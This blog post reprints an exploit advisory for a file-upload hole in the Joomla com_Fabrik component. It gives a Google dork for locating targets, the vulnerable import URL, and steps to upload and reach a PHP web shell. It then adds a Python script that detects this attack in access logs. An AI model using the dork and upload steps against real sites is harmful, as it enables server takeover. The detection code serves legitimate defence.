Sunday, March 6, 2016

Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

$********************************************************************************$
# +=================================================================+
# | Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability |
# +=================================================================+
# Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
# Date : 14/09/2012
# Exploit Author : D35m0nd142
# Vendor Homepage : http://fabrikar.com/
# Tested on : Mozilla Firefox on Ubuntu 12.04
$********************************************************************************$
# Vulnerable path :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
--
On this page it is possible to upload any type of file (php, asp, html, jpg ...) through the "Import CSV" form.
--
Screenshot of the upload page --> http://imageshack.us/photo/my-images/269/comfabrik.png/
--
After uploading the shell, go to --> http://[target]/media/yourshell.php
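Both halves of this issue leave traces in web server access logs: a POST to the com_fabrik import view, then a request for a script file under /media/. The Python below is an added detection example, not part of the original advisory; it assumes combined-format access logs, and the sample log lines, IP addresses and file names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; IPs and file names are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Sep/2012:10:01:02 +0000] "GET /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 200 5120
198.51.100.7 - - [14/Sep/2012:10:01:30 +0000] "POST /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 200 812
198.51.100.7 - - [14/Sep/2012:10:01:41 +0000] "GET /media/example.php HTTP/1.1" 200 17
203.0.113.9 - - [14/Sep/2012:10:02:00 +0000] "GET /media/system/js/core.js HTTP/1.1" 200 4410
203.0.113.9 - - [14/Sep/2012:10:03:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9000
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|asp|aspx)$', re.I)

def classify(method, target):
    """Label a request as import_view, import_upload, media_script or None."""
    url = urlsplit(target)
    q = {k.lower(): v[0].lower() for k, v in parse_qs(url.query).items()}
    if q.get("option") == "com_fabrik" and q.get("view") == "import":
        return "import_upload" if method == "POST" else "import_view"
    if url.path.lower().startswith("/media/") and SCRIPT_EXT.search(url.path):
        return "media_script"
    return None

def scan(log_text):
    """Return one finding per suspicious request, in log order."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        kind = classify(method, target)
        if kind is None:
            continue
        if kind == "import_upload":
            uploaders.add(ip)
        # A script request under /media/ from a client that posted to the import form earlier
        correlated = kind == "media_script" and ip in uploaders
        findings.append({"ip": ip, "kind": kind,
                         "status": int(status), "correlated": correlated})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `media_script` finding with a 200 status deserves review even when `correlated` is false, since the upload and the later request can come from different addresses.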
